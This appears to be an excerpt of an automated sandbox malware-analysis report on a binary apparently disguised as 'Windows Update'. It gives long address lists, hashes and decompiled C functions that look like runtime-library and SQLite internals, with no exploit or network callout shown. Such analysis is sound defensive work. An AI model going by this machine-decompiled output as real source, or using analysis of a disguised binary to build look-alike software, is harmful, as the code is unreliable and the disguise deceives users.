                                                                                                                    0x0005ad8a
                                                                                                                    0x0005ad8a
                                                                                                                    0x0005ad8a
                                                                                                                    0x0005ad93
                                                                                                                    0x0005ad96
                                                                                                                    0x0005ad99
                                                                                                                    0x0005ad9c
                                                                                                                    0x0005ada6
                                                                                                                    0x0005ada9
                                                                                                                    0x0005adac
                                                                                                                    0x0005adaf
                                                                                                                    0x0005adb2
                                                                                                                    0x0005adb7
                                                                                                                    0x0005adc3
                                                                                                                    0x0005adbf
                                                                                                                    0x0005adbf
                                                                                                                    0x0005adbf
                                                                                                                    0x0005adca
                                                                                                                    0x0005add1
                                                                                                                    0x0005add4
                                                                                                                    0x0005add8
                                                                                                                    0x0005addc
                                                                                                                    0x0005ade6
                                                                                                                    0x0005adf0
                                                                                                                    0x0005adfc
                                                                                                                    0x0005adfe
                                                                                                                    0x0005adfe
                                                                                                                    0x0005ae05
                                                                                                                    0x0005ae0f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0005acf8
                                                                                                                    0x0005aca5
                                                                                                                    0x0005ac6d
                                                                                                                    0x0005aaf0
                                                                                                                    0x0005aaf4
                                                                                                                    0x0005aaff
                                                                                                                    0x0005ab01
                                                                                                                    0x0005ab06
                                                                                                                    0x0005ae1b
                                                                                                                    0x0005ae24
                                                                                                                    0x0005ab0c
                                                                                                                    0x0005ab0c
                                                                                                                    0x0005ab0f
                                                                                                                    0x0005ab14
                                                                                                                    0x0005ab17
                                                                                                                    0x0005ab17
                                                                                                                    0x0005ab1b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0005ab1f
                                                                                                                    0x0005ab33
                                                                                                                    0x0005ab33
                                                                                                                    0x0005ab21
                                                                                                                    0x0005ab21
                                                                                                                    0x0005ab27
                                                                                                                    0x00000000
                                                                                                                    0x0005ab29
                                                                                                                    0x0005ab29
                                                                                                                    0x0005ab2c
                                                                                                                    0x0005ab31
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0005ab31
                                                                                                                    0x0005ab27
                                                                                                                    0x0005ab3c
                                                                                                                    0x0005ab3c
                                                                                                                    0x0005ab41
                                                                                                                    0x0005ab55
                                                                                                                    0x0005ab57
                                                                                                                    0x0005ab5a
                                                                                                                    0x0005ab43
                                                                                                                    0x0005ab43
                                                                                                                    0x0005ab43
                                                                                                                    0x0005ab60
                                                                                                                    0x0005ab62
                                                                                                                    0x0005ab67
                                                                                                                    0x0005ab67
                                                                                                                    0x0005ab68
                                                                                                                    0x0005ab67
                                                                                                                    0x0005ab6f
                                                                                                                    0x0005ab77
                                                                                                                    0x0005ab9c
                                                                                                                    0x0005abac
                                                                                                                    0x0005ab79
                                                                                                                    0x0005ab79
                                                                                                                    0x0005ab7f
                                                                                                                    0x00000000
                                                                                                                    0x0005ab81
                                                                                                                    0x0005ab87
                                                                                                                    0x0005ab97
                                                                                                                    0x0005ab97
                                                                                                                    0x0005ab7f
                                                                                                                    0x00000000
                                                                                                                    0x0005ab77
                                                                                                                    0x0005ab37
                                                                                                                    0x0005ab39
                                                                                                                    0x00000000
                                                                                                                    0x0005ab39
                                                                                                                    0x0005ab06
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 8bG$PFB
                                                                                                                    • API String ID: 0-3557998757
                                                                                                                    • Opcode ID: 0b749eba8c1860d0a13bccc6fc644d1c1d32429c8aa3b7bfa15f5c639c85171f
                                                                                                                    • Instruction ID: 7f862aac28ed53b89d75fec41ef56ffecf961257a5f8d5b815672216f44d1d2c
                                                                                                                    • Opcode Fuzzy Hash: 0b749eba8c1860d0a13bccc6fc644d1c1d32429c8aa3b7bfa15f5c639c85171f
                                                                                                                    • Instruction Fuzzy Hash: 19C1C4B1A00646AFDB10CF68C8817AABBF4FF16311F048269EC59D7742D335E958CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A121C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • swprintf.LIBCMT ref: 000A132B
                                                                                                                    • ___from_strstr_to_strchr.LIBCMT ref: 000A1339
                                                                                                                    • _wprintf.LIBCMT ref: 000A13C7
                                                                                                                    • _fprintf.LIBCMT ref: 000A13DE
                                                                                                                    • _fprintf.LIBCMT ref: 000A13F5
                                                                                                                      • Part of subcall function 000FDBDE: __lock_file.LIBCMT ref: 000FDC25
                                                                                                                      • Part of subcall function 000FDBDE: __stbuf.LIBCMT ref: 000FDCAA
                                                                                                                      • Part of subcall function 000FDBDE: __ftbuf.LIBCMT ref: 000FDCC6
                                                                                                                      • Part of subcall function 000FDCF0: __vfwprintf_l.LIBCMT ref: 000FDCFF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _fprintf$___from_strstr_to_strchr__ftbuf__lock_file__stbuf__vfwprintf_l_wprintfswprintf
                                                                                                                    • String ID: J
                                                                                                                    • API String ID: 2936582493-1141589763
                                                                                                                    • Opcode ID: da42587fde30b7eb313773d5b16a5c90e60bbd40a8e1fdb6fa5b87cb5f0714d8
                                                                                                                    • Instruction ID: 76120a6cd87b2f34fd11dda16b645ea5a9a7f809f2fa7dc6e8de616a876531c4
                                                                                                                    • Opcode Fuzzy Hash: da42587fde30b7eb313773d5b16a5c90e60bbd40a8e1fdb6fa5b87cb5f0714d8
                                                                                                                    • Instruction Fuzzy Hash: 9C51C271A4025C9BDB20EF94CD42FEDB3B8EB49705F1004A6F60CA7191EBB1AE848F55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0001D867 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 137COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: swprintf$_memset
                                                                                                                    • String ID: D
                                                                                                                    • API String ID: 1292703666-2746444292
                                                                                                                    • Opcode ID: 5f3aa764ff59d5899a7b3aa04a70e0d1a5d7d246ccbea1a6b2de96ceda57c230
                                                                                                                    • Instruction ID: f108b0c272b9a3a4a914319dcf3594acd6bfb9272cc5a2db7ac5fc907205bd90
                                                                                                                    • Opcode Fuzzy Hash: 5f3aa764ff59d5899a7b3aa04a70e0d1a5d7d246ccbea1a6b2de96ceda57c230
                                                                                                                    • Instruction Fuzzy Hash: C95161B1D012189AEB11EBA0DC45FDE73BCAF08700F4041A6F64CE6192EB75AB848F55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000FDD09 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E000FDD09(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t47;
				void* _t48;
				intOrPtr _t54;
				signed int _t60;
				void* _t61;
				intOrPtr _t65;
				void* _t68;

				_push(0x10);
				_push(0x480d30);
				E001028FC(__ebx, __edi, __esi);
				if((0 |  *((intOrPtr*)(_t68 + 8)) != 0x00000000) != 0) {
					_t65 =  *((intOrPtr*)(_t68 + 0xc));
					_t65 = _t65 != 0;
					if(_t65 != 0) {
						goto L1;
					} else {
						__eflags =  *(_t65 + 0xc) & 0x00000040;
						if(( *(_t65 + 0xc) & 0x00000040) != 0) {
							L14:
							_t54 = E00103BCC( *((intOrPtr*)(_t68 + 8)));
							 *((intOrPtr*)(_t68 - 0x1c)) = _t54;
							E00102C8C(_t65);
							 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
							_t41 = E00102B22(_t54, __eflags, _t65);
							 *((intOrPtr*)(_t68 - 0x20)) = E00103A6D( *((intOrPtr*)(_t68 + 8)), 1, _t54, _t65);
							E00102AF1(_t41, _t65);
							 *(_t68 - 4) = 0xfffffffe;
							L000FDE07(_t65);
							__eflags =  *((intOrPtr*)(_t68 - 0x20)) - _t54;
							_t37 = (__eflags == 0) - 1;
							__eflags = (__eflags == 0) - 1;
						} else {
							_t47 = E00102BC8(_t65);
							_t60 = _t47;
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L7:
								_t48 = 0x483640;
							} else {
								__eflags = _t60 - 0xfffffffe;
								if(_t60 == 0xfffffffe) {
									goto L7;
								} else {
									_t48 = ((_t47 & 0x0000001f) << 6) +  *((intOrPtr*)(0x48b030 + (_t60 >> 5) * 4));
								}
							}
							__eflags =  *(_t48 + 0x24) & 0x0000007f;
							if(( *(_t48 + 0x24) & 0x0000007f) != 0) {
								goto L1;
							} else {
								__eflags = _t60 - 0xffffffff;
								if(_t60 == 0xffffffff) {
									L12:
									_t61 = 0x483640;
								} else {
									__eflags = _t60 - 0xfffffffe;
									if(_t60 == 0xfffffffe) {
										goto L12;
									} else {
										_t61 = ((_t60 & 0x0000001f) << 6) +  *((intOrPtr*)(0x48b030 + (_t60 >> 5) * 4));
									}
								}
								__eflags =  *(_t61 + 0x24) & 0x00000080;
								if(( *(_t61 + 0x24) & 0x00000080) != 0) {
									goto L1;
								} else {
									goto L14;
								}
							}
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E00100A4A())) = 0x16;
					_t37 = E001009DB() | 0xffffffff;
				}
				return E00102941(_t37);
			}











                                                                                                                    0x000fdd09
                                                                                                                    0x000fdd0b
                                                                                                                    0x000fdd10
                                                                                                                    0x000fdd1f
                                                                                                                    0x000fdd3b
                                                                                                                    0x000fdd43
                                                                                                                    0x000fdd45
                                                                                                                    0x00000000
                                                                                                                    0x000fdd47
                                                                                                                    0x000fdd47
                                                                                                                    0x000fdd4b
                                                                                                                    0x000fddac
                                                                                                                    0x000fddb4
                                                                                                                    0x000fddb6
                                                                                                                    0x000fddba
                                                                                                                    0x000fddc1
                                                                                                                    0x000fddc6
                                                                                                                    0x000fddd9
                                                                                                                    0x000fddde
                                                                                                                    0x000fdde6
                                                                                                                    0x000fdded
                                                                                                                    0x000fddf4
                                                                                                                    0x000fddfa
                                                                                                                    0x000fddfa
                                                                                                                    0x000fdd4d
                                                                                                                    0x000fdd4e
                                                                                                                    0x000fdd54
                                                                                                                    0x000fdd56
                                                                                                                    0x000fdd59
                                                                                                                    0x000fdd74
                                                                                                                    0x000fdd74
                                                                                                                    0x000fdd5b
                                                                                                                    0x000fdd5b
                                                                                                                    0x000fdd5e
                                                                                                                    0x00000000
                                                                                                                    0x000fdd60
                                                                                                                    0x000fdd6b
                                                                                                                    0x000fdd6b
                                                                                                                    0x000fdd5e
                                                                                                                    0x000fdd79
                                                                                                                    0x000fdd7d
                                                                                                                    0x00000000
                                                                                                                    0x000fdd7f
                                                                                                                    0x000fdd7f
                                                                                                                    0x000fdd82
                                                                                                                    0x000fdd9d
                                                                                                                    0x000fdd9d
                                                                                                                    0x000fdd84
                                                                                                                    0x000fdd84
                                                                                                                    0x000fdd87
                                                                                                                    0x00000000
                                                                                                                    0x000fdd89
                                                                                                                    0x000fdd94
                                                                                                                    0x000fdd94
                                                                                                                    0x000fdd87
                                                                                                                    0x000fdda2
                                                                                                                    0x000fdda6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000fdda6
                                                                                                                    0x000fdd7d
                                                                                                                    0x000fdd4b
                                                                                                                    0x000fdd21
                                                                                                                    0x000fdd21
                                                                                                                    0x000fdd26
                                                                                                                    0x000fdd31
                                                                                                                    0x000fdd31
                                                                                                                    0x000fde00

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __ftbuf__getptd_noexit__lock_file__stbuf_strlen
                                                                                                                    • String ID: @6H$@6H
                                                                                                                    • API String ID: 583463211-3440816193
                                                                                                                    • Opcode ID: 327e8a4bebd1dfa414da4e92ce065c79d205ae387f7221e7844e2ad90fe42299
                                                                                                                    • Instruction ID: 4b76744a232acbc46593c313c92bc1f167fca897ce61be7b36e91cedc767bc0f
                                                                                                                    • Opcode Fuzzy Hash: 327e8a4bebd1dfa414da4e92ce065c79d205ae387f7221e7844e2ad90fe42299
                                                                                                                    • Instruction Fuzzy Hash: 4D217F71A1020C5ADB617F788C0573D3AE2AF95374F14C766F5748B5D2E7B88942B204
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00046977 Relevance: 10.1, Strings: 8, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00046977(intOrPtr* _a4) {
				void* _t4;
				signed char _t6;
				signed int _t11;
				intOrPtr* _t13;

				_t13 = _a4;
				_t11 = 0;
				_t4 = 0x63;
				if(_t13 == 0) {
					L26:
					return _t4;
				} else {
					_t6 =  *_t13;
					if(_t6 == 0) {
						goto L26;
					} else {
						do {
							_t11 = (_t11 << 8) + ( *((_t6 & 0x000000ff) + 0x472f30) & 0x000000ff);
							_t13 = _t13 + 1;
							if(_t11 != 0x63686172) {
								if(_t11 != 0x636c6f62) {
									if(_t11 != 0x74657874) {
										if(_t11 != 0x626c6f62) {
											if(_t11 != 0x7265616c) {
												if(_t11 != 0x666c6f61) {
													if(_t11 != 0x646f7562 || _t4 != 0x63) {
														goto L22;
													} else {
														_t4 = 0x65;
													}
												} else {
													if(_t4 != 0x63) {
														goto L22;
													} else {
														_t4 = 0x65;
													}
												}
											} else {
												if(_t4 != 0x63) {
													goto L22;
												} else {
													_t4 = 0x65;
												}
											}
										} else {
											if(_t4 == 0x63 || _t4 == 0x65) {
												_t4 = 0x62;
											} else {
												L22:
												if((_t11 & 0x00ffffff) == 0x696e74) {
													return 0x64;
												}
											}
										}
									} else {
										_t4 = 0x61;
									}
								} else {
									_t4 = 0x61;
								}
							} else {
								_t4 = 0x61;
							}
							_t6 =  *_t13;
						} while (_t6 != 0);
						return _t4;
					}
				}
			}







                                                                                                                    0x0004697b
                                                                                                                    0x0004697e
                                                                                                                    0x00046980
                                                                                                                    0x00046984
                                                                                                                    0x00046a32
                                                                                                                    0x00046a32
                                                                                                                    0x0004698a
                                                                                                                    0x0004698a
                                                                                                                    0x0004698e
                                                                                                                    0x00000000
                                                                                                                    0x00046997
                                                                                                                    0x00046997
                                                                                                                    0x000469a4
                                                                                                                    0x000469a6
                                                                                                                    0x000469af
                                                                                                                    0x000469bb
                                                                                                                    0x000469c7
                                                                                                                    0x000469d3
                                                                                                                    0x000469e7
                                                                                                                    0x000469f7
                                                                                                                    0x00046a07
                                                                                                                    0x00000000
                                                                                                                    0x00046a0d
                                                                                                                    0x00046a0d
                                                                                                                    0x00046a0d
                                                                                                                    0x000469f9
                                                                                                                    0x000469fb
                                                                                                                    0x00000000
                                                                                                                    0x000469fd
                                                                                                                    0x000469fd
                                                                                                                    0x000469fd
                                                                                                                    0x000469fb
                                                                                                                    0x000469e9
                                                                                                                    0x000469eb
                                                                                                                    0x00000000
                                                                                                                    0x000469ed
                                                                                                                    0x000469ed
                                                                                                                    0x000469ed
                                                                                                                    0x000469eb
                                                                                                                    0x000469d5
                                                                                                                    0x000469d7
                                                                                                                    0x000469dd
                                                                                                                    0x00046a11
                                                                                                                    0x00046a11
                                                                                                                    0x00046a1f
                                                                                                                    0x00000000
                                                                                                                    0x00046a2e
                                                                                                                    0x00046a1f
                                                                                                                    0x000469d7
                                                                                                                    0x000469c9
                                                                                                                    0x000469c9
                                                                                                                    0x000469c9
                                                                                                                    0x000469bd
                                                                                                                    0x000469bd
                                                                                                                    0x000469bd
                                                                                                                    0x000469b1
                                                                                                                    0x000469b1
                                                                                                                    0x000469b1
                                                                                                                    0x00046a21
                                                                                                                    0x00046a23
                                                                                                                    0x00046a2d
                                                                                                                    0x00046a2d
                                                                                                                    0x0004698e

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: aolf$bolb$bolc$buod$laer$rahc$tni$txet
                                                                                                                    • API String ID: 0-2685204555
                                                                                                                    • Opcode ID: 193eda4ff26643cb186817329ffe3e6c0bab4abed965136141e6db746d9bbf84
                                                                                                                    • Instruction ID: 93273f601ff6e693bf890e560dbd22ed5776d173da21c27ded8836cd3d5efea9
                                                                                                                    • Opcode Fuzzy Hash: 193eda4ff26643cb186817329ffe3e6c0bab4abed965136141e6db746d9bbf84
                                                                                                                    • Instruction Fuzzy Hash: 6511A3D89D8914028DB44C9844A41FD6BDA4B93728B78D077C9A67B307FA234CA36E5F
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A008C Relevance: 9.2, APIs: 6, Instructions: 234COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8268b381921ce074d9fa261bae41c43fabe9a041f817e53f70b47d369c895502
                                                                                                                    • Instruction ID: 001667f3f9fd5ccb1fa3974512101816346005cc71049765a39cde4ace703f39
                                                                                                                    • Opcode Fuzzy Hash: 8268b381921ce074d9fa261bae41c43fabe9a041f817e53f70b47d369c895502
                                                                                                                    • Instruction Fuzzy Hash: DB918FB1D4012EAADB21DB90CC41FFBB7BCAB48306F0541EAF619A2141DB756F849F64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000DF66C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 99%
                                                                                                                    			E000DF66C(signed int _a4, intOrPtr* _a8, signed int _a12, intOrPtr _a16, signed int _a20, signed int _a24) {
				signed short _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t116;
				intOrPtr* _t118;
				signed int _t132;
				signed int _t135;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				intOrPtr _t153;
				signed short _t161;
				signed int _t174;
				signed int _t175;
				char* _t182;
				signed int _t183;
				signed int _t184;
				unsigned int _t186;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				intOrPtr _t195;
				char* _t196;
				short _t197;
				signed int _t199;
				intOrPtr _t200;
				intOrPtr* _t201;
				char _t204;
				void* _t205;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr* _t208;
				signed int _t209;
				intOrPtr _t210;
				intOrPtr* _t211;
				signed int _t212;
				char* _t213;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t221;

				_t186 = _a20;
				_v24 = 0;
				_v12 = 0;
				_t207 = _a4;
				_v28 =  !_t186 & 0x00000001;
				_t116 =  *((intOrPtr*)(_t207 + 4));
				_t209 = 0;
				_t182 = 0;
				_v20 = 0;
				_a20 = _t186 >> 0x00000001 & 0x00000001;
				_v8 = 0x400;
				if(_t116 <= 0x28) {
					_v16 = 0x28;
				} else {
					_v16 = _t116 + 0x00000007 & 0xfffffff8;
				}
				 *_a8 = _t182;
				_t118 = _a12;
				if(_t118 == 0 ||  *_t118 == _t182) {
					L23:
					_v32 = ( *((intOrPtr*)(_t207 + 4)) + 0x00000007 & 0xfffffff8) + (_v16 + _t209) * 2 + 0xea;
					_t208 = L000DDD9C(( *((intOrPtr*)(_t207 + 4)) + 0x00000007 & 0xfffffff8) + (_v16 + _t209) * 2 + 0xea);
					_t218 = _t217 + 4;
					if(_t208 == 0) {
						L000ABDBC(_t182);
						goto L52;
					} else {
						L000FCE0C(_t208, 0, _v32);
						_t34 = _t208 + 0xb0; // 0xb0
						_t191 = _t34;
						 *((intOrPtr*)(_t208 + 0xa8)) = _t191;
						_t192 = _t191 + 0x30;
						 *((intOrPtr*)(_t208 + 0x38)) = _t192;
						_t193 = _t192 + ( *((intOrPtr*)(_a4 + 4)) + 0x00000007 & 0xfffffff8);
						 *((intOrPtr*)(_t208 + 0x40)) = _t193;
						_t194 = _t193 + _v16;
						_t220 = _t218 + 0xc;
						 *((intOrPtr*)(_t208 + 0x3c)) = _t194;
						_t195 = _t194 + _v16;
						 *((intOrPtr*)(_t208 + 0x84)) = _t195;
						if(_t182 != 0) {
							_t43 = _t195 + 1; // 0x29
							 *((intOrPtr*)(_t208 + 0x88)) = _t43 + _t209;
							L000FBECC(_t195, _t182, _t209);
							L000FBECC( *((intOrPtr*)(_t208 + 0x88)), _t182, _t209);
							_t200 =  *((intOrPtr*)(_t208 + 0x88));
							 *((intOrPtr*)(_t209 + _t200)) =  *0x479668;
							 *((intOrPtr*)(_t209 + _t200 + 4)) =  *0x47966c;
							L000ABDBC(_t182);
							_t220 = _t220 + 0x1c;
						}
						_t196 = _a12;
						_t132 = _a4;
						_t183 = _a24;
						 *_t208 = _t132;
						 *(_t208 + 0x78) = _t183;
						if(_t196 == 0 ||  *_t196 == 0 || _v12 != 0) {
							_v24 = 1;
							 *((char*)(_t208 + 0xe)) = 4;
							_t184 = _t183 & 0x00000001;
							goto L36;
						} else {
							_a4 = 0;
							_t199 =  *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x18))))(_t132,  *((intOrPtr*)(_t208 + 0x84)),  *((intOrPtr*)(_t208 + 0x38)), _t183,  &_a4);
							_t221 = _t220 + 0x14;
							_t184 = _a4 & 0x00000001;
							_a12 = _t199;
							if(_t199 != 0) {
								L37:
								_t211 =  *((intOrPtr*)(_t208 + 0x38));
								_t153 =  *_t211;
								if(_t153 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t153 + 4))))(_t211);
									_t221 = _t221 + 4;
									 *_t211 = 0;
								}
								L000ABDBC(_t208);
								return _a12;
							} else {
								if(_t184 == 0) {
									E000CAB8C(_t208);
									_t161 =  *(_t208 + 0x70);
									_t220 = _t221 + 4;
									if(_t161 > 0x400) {
										if(_t161 <= 0x2000) {
											_v8 = _t161 & 0x0000ffff;
										} else {
											_v8 = 0x2000;
										}
									}
								}
								L36:
								_t135 = L000DFD7C(_t208,  &_v8, 0xffffffff);
								_t221 = _t220 + 0xc;
								_a12 = _t135;
								if(_t135 == 0) {
									_t210 =  *((intOrPtr*)(_t208 + 0xa8));
									_a4 = _a16 + 0x00000007 & 0xfffffff8;
									L000FCE0C(_t210, 0, 0x30);
									_t204 = _v12;
									_t197 = _a4;
									 *(_t210 + 0x14) = _v8 & 0x0000ffff;
									_a4 = 0x426c30;
									 *((intOrPtr*)(_t210 + 0x18)) = _t197;
									 *((intOrPtr*)(_t210 + 0x24)) = _t208;
									 *((intOrPtr*)(_t210 + 0x10)) = 0x64;
									 *(_t210 + 0x1c) = 0 | _t204 == 0x00000000;
									_t144 =  ==  ? _a4 : 0;
									 *((intOrPtr*)(_t210 + 0x20)) =  ==  ? _a4 : 0;
									 *((char*)(_t208 + 6)) = _v28;
									if(_a20 == 0 || _t184 == 0) {
										_t146 = 0;
									} else {
										_t146 = 1;
									}
									 *(_t208 + 7) = _t146;
									_t147 = _v24;
									 *((char*)(_t208 + 0x15)) = _t204;
									 *((intOrPtr*)(_t208 + 0x80)) = 0x3fffffff;
									 *(_t208 + 0xb) = _t147;
									 *(_t208 + 4) = _t147;
									 *(_t208 + 0x12) = _t147;
									 *((char*)(_t208 + 0xd)) = _t204;
									 *(_t208 + 0xc) = _t184;
									if(_t147 != 0 || _v28 == 0) {
										_t148 = 1;
									} else {
										_t148 = 0;
									}
									 *(_t208 + 8) = _t148;
									 *((char*)(_t208 + 9)) = _t148 & 0xffffff00 | _t148 == 0x00000000;
									 *((char*)(_t208 + 0xa)) = 2;
									 *((short*)(_t208 + 0x74)) = _t197;
									 *((intOrPtr*)(_t208 + 0xa0)) = 0xffffffff;
									 *((intOrPtr*)(_t208 + 0xa4)) = 0xffffffff;
									E000CAB8C(_t208);
									if(_v12 != 0) {
										 *((char*)(_t208 + 5)) = 4;
									}
									 *_a8 = _t208;
									return 0;
								} else {
									goto L37;
								}
							}
						}
					}
				} else {
					_v32 =  *((intOrPtr*)(_t207 + 8)) + 1;
					_t182 = L000DDD9C( *((intOrPtr*)(_t207 + 8)) + 1 +  *((intOrPtr*)(_t207 + 8)) + 1);
					_t217 = _t217 + 4;
					if(_t182 == 0) {
						L52:
						return 7;
					} else {
						_t212 = _a12;
						_t201 = 0x47965c;
						_t174 = _t212;
						while(1) {
							_t205 =  *_t174;
							if(_t205 !=  *_t201) {
								break;
							}
							if(_t205 == 0) {
								L11:
								_t175 = 0;
							} else {
								_t206 =  *((intOrPtr*)(_t174 + 1));
								if(_t206 !=  *((intOrPtr*)(_t201 + 1))) {
									break;
								} else {
									_t174 = _t174 + 2;
									_t201 = _t201 + 2;
									if(_t206 != 0) {
										continue;
									} else {
										goto L11;
									}
								}
							}
							L13:
							 *_t182 = 0;
							if(_t175 != 0) {
								_t175 =  *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x24))))(_t207, _t212, _v32, _t182);
								_t217 = _t217 + 0x10;
								_v20 = _t175;
							} else {
								_v12 = 1;
							}
							_t213 = _t182;
							if( *_t182 != 0) {
								do {
									_t213 = _t213 + 1;
								} while ( *_t213 != 0);
							}
							_t209 = _t213 - _t182 & 0x3fffffff;
							if(_t175 != 0) {
								L000ABDBC(_t182);
								return _v20;
							} else {
								_t24 = _t209 + 8; // 0x9
								if(_t24 <=  *((intOrPtr*)(_t207 + 8))) {
									goto L23;
								} else {
									L000ABDBC(_t182);
									return 0xe;
								}
							}
							goto L53;
						}
						asm("sbb eax, eax");
						_t175 = _t174 | 0x00000001;
						goto L13;
					}
				}
				L53:
			}

















































                                                                                                                    0x000df672
                                                                                                                    0x000df677
                                                                                                                    0x000df67a
                                                                                                                    0x000df687
                                                                                                                    0x000df68c
                                                                                                                    0x000df68f
                                                                                                                    0x000df692
                                                                                                                    0x000df697
                                                                                                                    0x000df699
                                                                                                                    0x000df69c
                                                                                                                    0x000df69f
                                                                                                                    0x000df6a9
                                                                                                                    0x000df6b6
                                                                                                                    0x000df6ab
                                                                                                                    0x000df6b1
                                                                                                                    0x000df6b1
                                                                                                                    0x000df6c0
                                                                                                                    0x000df6c2
                                                                                                                    0x000df6c7
                                                                                                                    0x000df792
                                                                                                                    0x000df7a9
                                                                                                                    0x000df7b1
                                                                                                                    0x000df7b3
                                                                                                                    0x000df7b8
                                                                                                                    0x000df9f6
                                                                                                                    0x00000000
                                                                                                                    0x000df7be
                                                                                                                    0x000df7c4
                                                                                                                    0x000df7cc
                                                                                                                    0x000df7cc
                                                                                                                    0x000df7d2
                                                                                                                    0x000df7d8
                                                                                                                    0x000df7db
                                                                                                                    0x000df7e7
                                                                                                                    0x000df7e9
                                                                                                                    0x000df7ec
                                                                                                                    0x000df7ef
                                                                                                                    0x000df7f2
                                                                                                                    0x000df7f5
                                                                                                                    0x000df7f8
                                                                                                                    0x000df800
                                                                                                                    0x000df803
                                                                                                                    0x000df80a
                                                                                                                    0x000df810
                                                                                                                    0x000df81d
                                                                                                                    0x000df822
